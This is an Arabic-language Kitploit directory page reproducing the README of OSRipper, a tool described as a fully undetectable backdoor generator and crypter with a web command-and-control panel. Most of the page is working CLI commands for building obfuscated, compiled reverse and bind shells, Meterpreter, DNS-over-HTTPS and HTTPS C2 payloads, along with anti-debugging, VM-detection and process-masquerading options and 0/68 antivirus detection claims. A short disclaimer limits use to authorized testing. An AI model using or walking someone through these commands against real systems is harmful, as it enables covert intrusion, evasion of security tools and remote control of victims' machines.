Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OSRipper — إطار عمل باب خلفي وتشفير متعدد المنصات يتجنب اكتشاف برامج مكافحة الفيروسات، مع واجهة ويب خفيفة الوزن مدمجة. | Kitploit
أدوات/GitHubGitHub/noahoksuz/osripper
أطر الاستغلالتوليد الحمولةالتهرب من IDS/IPSما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر
GitHubnoahoksuz/osripper

OSRipper

إطار عمل باب خلفي وتشفير متعدد المنصات يتجنب اكتشاف برامج مكافحة الفيروسات، مع واجهة ويب خفيفة الوزن مدمجة.

عرض المستودع
3285058منذ 6 أشهرتمت المراجعة من قبل Kitploit
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

مُولِّد ومشفر حمولات متقدم عبر المنصات مع قدرات غير قابلة للكشف (FUD)

الميزات • بداية سريعة • واجهة الويب • أنواع الحمولات • التوثيق


نظرة عامة

OSRipper هو مُولِّد ومشفر باب خلفي متطور، غير قابل للاكتشاف تمامًا (FUD)، مصمم لاختبار الاختراق المأذون به وعمليات الفريق الأحمر. يتميز بتقنيات تهرب متقدمة، وأنواع حمولات متعددة، وواجهة C2 ويب حديثة لإدارة الأنظمة المخترقة.

أبرز الميزات

  • غير قابل للاكتشاف تمامًا (FUD) - تقنيات تهرب متقدمة تتجاوز حلول الحماية الحديثة
  • واجهة C2 ويب - لوحة تحكم حديثة لإدارة الجلسات النشطة
  • أنواع حمولات متعددة - قذائف ربط، قذائف عكسية، DoH C2، HTTPS C2، والمزيد
  • إخفاء متعدد الطبقات - إخفاء قياسي ومحسّن بمتغيرات عشوائية
  • تجميع ثنائي - تجميع الحمولات إلى ملفات تنفيذية مستقلة
  • اتصالات مشفرة - قنوات C2 باستخدام SSL/TLS ومثبتة الشهادة (HTTPS)
  • ميزات التخفي - كشف الأجهزة الافتراضية، مكافحة التصحيح، تمويه العمليات

الميزات

توليد الحمولات

نوع الحمولةالوصفحالة الاستخدام
قذيفة ربط (Bind Shell)يفتح منفذًا على جهاز الضحيةالوصول المباشر عند منع الاتصالات العكسية
متربريتر عكسي عبر TCPاتصال عكسي مشفر عبر SSL/TLSاختبار الاختراق القياسي
DoH C2 (DNS عبر HTTPS)قيادة وتحكم خفي عبر بروتوكول DoHتجاوز قيود الشبكة
HTTPS C2قناة C2 آمنة ومثبتة الشهادة باستخدام HTTPSقناة C2 آمنة وموثقة
حمولة مرحلية (Staged Payload)توصيل ويب متعدد المراحلنشر خفي محسّن
مشفر أكواد مخصصةإخفاء أي سكريبت بايثونتشفير حمولات مخصصة

تقنيات التهرب

  • إخفاء متقدم - ترميز كود متعدد الطبقات مع متغيرات عشوائية
  • إخفاء محسّن - مكافحة التصحيح، كشف الأجهزة الافتراضية، حقن كود غير مفيد
  • كشف الأجهزة الافتراضية - التهرب من بيئات الحماية (Sandbox) والأجهزة الافتراضية
  • تأخيرات خفية - تأخيرات عشوائية عند بدء التشغيل (5-15 ثانية)
  • تمويه العمليات - التخفي كعمليات نظام شرعية
  • عشوائية التوقيع - كل حمولة فريدة

ميزات واجهة الويب

  • لوحة تحكم الجلسات - عرض جميع جلسات C2 النشطة
  • طرفية تفاعلية - تنفيذ الأوامر عبر واجهة الويب
  • مولّد الحمولات - إنشاء الحمولات مباشرة من واجهة الويب
  • إدارة الجلسات - عرض معلومات النظام، سجل الأوامر، وإدارة الجلسات
  • تحديثات لحظية - تنفيذ الأوامر وعرض الردود في الوقت الحقيقي

قدرات متقدمة

  • التكامل مع Ngrok - إنشاء نفق تلقائي لعناوين IP الديناميكية
  • تثبيت الشهادة - HTTPS C2 آمن مع التحقق من الشهادة
  • استمرارية الجلسة - الحفاظ على الاتصالات عبر عمليات إعادة التشغيل
  • طابور الأوامر - ترتيب الأوامر للوكلاء غير المتصلين
  • تحليل الردود - تحليل تلقائي لمخرجات الأوامر

بداية سريعة

التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# تثبيت التبعيات
pip3 install -r requirements.txt

# تثبيت الحزمة
pip3 install -e .

هام — قم بتشغيل الإعداد للميزات الاختيارية (ngrok، التجميع الثنائي):
على العديد من الأنظمة (خاصة لينكس مع بيئة بايثون مدارة خارجيًا)، يجب عليك تشغيل الإعداد المدمج لتثبيت التبعيات الاختيارية في البيئة الافتراضية الخاصة بـ OSRipper. قم بذلك مرة واحدة بعد التثبيت:

root@kitploit:~
osripper-cli setup

سيؤدي ذلك إلى إنشاء ~/.local/share/osripper/venv، وتثبيت pyngrok و nuitka و sandboxed هناك، وستستخدمها جميع عمليات تشغيل osripper / osripper-cli اللاحقة تلقائيًا. بدون ذلك، سيطلب منك --ngrok و --compile تشغيل الإعداد. استخدم osripper-cli setup --system فقط إذا كنت تفضل تثبيت pip على مستوى النظام/المستخدم بدلاً من البيئة الافتراضية.

الاستخدام الأساسي

الوضع التفاعلي:

root@kitploit:~
osripper
# أو
python3 -m osripper

سطر الأوامر:

root@kitploit:~
# إنشاء قذيفة عكسية
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# إنشاء حمولة DoH C2
osripper-cli doh -d example.com --obfuscate --compile

واجهة الويب:

root@kitploit:~
# بدء خادم C2 مع واجهة الويب
python -m osripper.c2.server example.com --port 5000

# الوصول إلى لوحة التحكم على http://localhost:5000

واجهة الويب

يتضمن OSRipper واجهة C2 ويب حديثة لإدارة الأنظمة المخترقة.

الميزات

  • لوحة التحكم - نظرة عامة على جميع الجلسات النشطة
  • إدارة الجلسات - عرض معلومات النظام وتنفيذ الأوامر
  • مولّد الحمولات - إنشاء حمولات DoH و HTTPS عبر واجهة الويب
  • سجل الأوامر - تتبع جميع الأوامر المنفذة والردود
  • تحديثات لحظية - تنفيذ الأوامر وعرض الردود في الوقت الحقيقي

بدء خادم C2

root@kitploit:~
# الاستخدام الأساسي
python -m osripper.c2.server example.com

# مع HTTPS
python -m osripper.c2.server example.com --https

# منفذ مخصص
python -m osripper.c2.server example.com --port 8080

# مع شهادة مخصصة
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

الوصول إلى واجهة الويب

بمجرد تشغيل الخادم، يمكن الوصول إلى لوحة التحكم على:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (إذا تم تفعيله)

أنواع الحمولات

1. باب خلفي بقذيفة ربط

يفتح منفذًا على جهاز الضحية وينتظر الاتصالات.

root@kitploit:~
osripper-cli bind -p 4444 --obfuscate --compile

الاتصال:

root@kitploit:~
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. متربريتر عكسي عبر TCP

اتصال عكسي مشفر عبر SSL/TLS.

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DoH C2 (DNS عبر HTTPS)

قناة C2 خفية تستخدم بروتوكول DNS عبر HTTPS. تتجاوز العديد من قيود الشبكة.

root@kitploit:~
# إنشاء الحمولة
osripper-cli doh -d example.com --obfuscate --compile

# بدء خادم C2
python -m osripper.c2.server example.com

الميزات:

  • اتصال خفي قائم على DNS
  • واجهة ويب لإدارة الجلسات
  • استمرارية الجلسة التلقائية
  • طابور الأوامر للوكلاء غير المتصلين

4. HTTPS C2 (تثبيت الشهادة)

HTTPS C2 آمن مع تثبيت الشهادة للمصادقة.

root@kitploit:~
# إنشاء الحمولة (عبر واجهة الويب أو CLI)
# بدء خادم C2 مع HTTPS
python -m osripper.c2.server example.com --https

# الحصول على بصمة الشهادة
curl http://localhost:5000/api/cert-fingerprint

الميزات:

  • تثبيت الشهادة للأمان
  • اتصال HTTPS مشفر
  • تكامل واجهة الويب
  • إدارة الجلسات

5. حمولة مرحلية

توصيل ويب متعدد المراحل لتعزيز التخفي.

root@kitploit:~
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. مشفر أكواد مخصصة

إخفاء وتشفير أي سكريبت بايثون.

root@kitploit:~
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

واجهة سطر الأوامر

الخيارات الشائعة

الخيارالوصف
--obfuscateتفعيل الإخفاء متعدد الطبقات
--enhancedإخفاء محسّن (مكافحة التصحيح، كشف الأجهزة الافتراضية)
--compileتجميع إلى ملف ثنائي مستقل
--icon PATHأيقونة مخصصة للملف المترجم
--delayإضافة تأخير عشوائي عند بدء التشغيل (5-15 ثانية)
--output, -o NAMEاسم ملف الإخراج
--quiet, -qوضع هادئ (إخراج محدود)

أمثلة

root@kitploit:~
# قذيفة عكسية كاملة الميزات
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# DoH C2 بكل الميزات
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# تشفير سكريبت مخصص
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# استخدام ngrok لعنوان IP ديناميكي
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

نتائج الكشف

أحدث فحوصات VirusTotal

  • حمولة بايثون: معدل كشف 0/68
  • ملف مترجم: معدل كشف 0/68

نتيجة antiscan

نتائج Antiscan


البنية

root@kitploit:~
┌─────────────────┐
│   الملف الثنائي  │
│   المُنشأ        │
└─────────────────┘
         │
         │ تنفيذ
         ▼
┌──────────────────┐
│ مُحمّل مخفي      │
│ (Obfuscated)     │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   خادم C2       │
│   (واجهة ويب)   │
│                 │
└─────────────────┘
         │
         │ أمر / استجابة
         ▼
┌─────────────────┐
│   الوكيل        │
│   التنفيذ       │
└─────────────────┘

لقطات الشاشة

الواجهة الرئيسية

لوحة تحكم واجهة الويب

لوحة تحكم واجهة الويب


الإعداد المتقدم

التكامل مع Ngrok

root@kitploit:~
# إنشاء حمولة مع ngrok
osripper-cli reverse --ngrok -p 4444

# اتبع التعليمات لإعداد النفق
# نفّذ: ngrok tcp 4444

أيقونات مخصصة

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

مستويات الإخفاء

الإخفاء القياسي:

  • ترميز متعدد الطبقات
  • عشوائية المتغيرات
  • إخفاء بنية الكود

الإخفاء المحسّن:

  • جميع ميزات القياسي
  • تقنيات مكافحة التصحيح
  • كشف الأجهزة الافتراضية
  • حقن كود غير مفيد
  • تهرب متقدم
root@kitploit:~
# قياسي
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# محسّن
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

إعداد HTTPS C2

root@kitploit:~
# 1. بدء خادم C2 مع HTTPS
python -m osripper.c2.server example.com --https

# 2. الحصول على بصمة الشهادة
curl http://localhost:5000/api/cert-fingerprint

# 3. إنشاء الحمولة بالبصمة (عبر واجهة الويب)
# أو استخدم البصمة في إنشاء الحمولة

التوثيق

  • الويكي - توثيق شامل
  • دليل الاستخدام - تعليمات استخدام مفصلة
  • مرجع API - توثيق المطورين

خارطة الطريق

تم إنجازه (الإصدار v0.3.2)

  • توليد حمولات غير قابلة للكشف (0/68 كشف)
  • واجهة C2 ويب
  • حمولة C2 عبر DNS-over-HTTPS
  • HTTPS C2 مع تثبيت الشهادة
  • محرك إخفاء متعدد الطبقات
  • نظام إدارة الجلسات
  • ترتيب الأوامر وتنفيذها
  • كشف الأجهزة الافتراضية
  • تمويه العمليات

قيد التطوير

  • وحدات استغلال متقدمة بعد الاختراق
  • آليات استمرارية متقدمة
  • رفع/تنزيل الملفات عبر واجهة الويب
  • دعم متعدد المستخدمين لخادم C2

خطط مستقبلية

  • تقنيات تهرب مدعومة بالذكاء الاصطناعي
  • بنية تحتية لـ C2 قائمة على البلوكشين
  • دعم منصات الجوال
  • حمولات هندسة اجتماعية متقدمة

المساهمة

نرحب بالمساهمات من مجتمع أبحاث الأمن السيبراني!

كيفية المساهمة

  1. انسخ المستودع (Fork)
  2. أنشئ فرعًا للميزة (git checkout -b feature/mizah-rayeaa)
  3. ادمج تغييراتك (git commit -m 'إضافة ميزة رائعة')
  4. ارفع إلى الفرع (git push origin feature/mizah-rayeaa)
  5. افتح طلب سحب (Pull Request)

إرشادات التطوير

  • اتبع معايير الترميز PEP 8
  • أضف توثيقًا لجميع الدوال
  • اختبر على منصات متعددة
  • تأكد من بقاء قدرات FUD سليمة

الشكر والتقدير

شكر خاص لمجتمع أبحاث الأمن السيبراني وهذه المشاريع:

  • htr-tech/PyObfuscate - إلهام الإخفاء
  • cedowens/SwiftBelt - تعداد macOS
  • Metasploit Framework - معالجة الحمولات

إخلاء مسؤولية قانوني

هام: تم تطوير هذه الأداة للأغراض التعليمية واختبار الاختراق المأذون به فقط.

  • الاستخدام المأذون به: أبحاث الأمن السيبراني، اختبار الاختراق، تمارين الفريق الأحمر
  • الاستخدام المحظور: الوصول غير المصرح به، الأنشطة الخبيثة، الأغراض غير القانونية

المطورون ليسوا مسؤولين عن إساءة استخدام هذا البرنامج. يجب على المستخدمين الامتثال لجميع القوانين واللوائح المعمول بها.


الدعم

  • تقارير الأخطاء: افتح مشكلة
  • طلبات الميزات: المناقشات
  • المشكلات الأمنية: اتصل بالمطوّرين بشكل خاص
تنزيل الأداة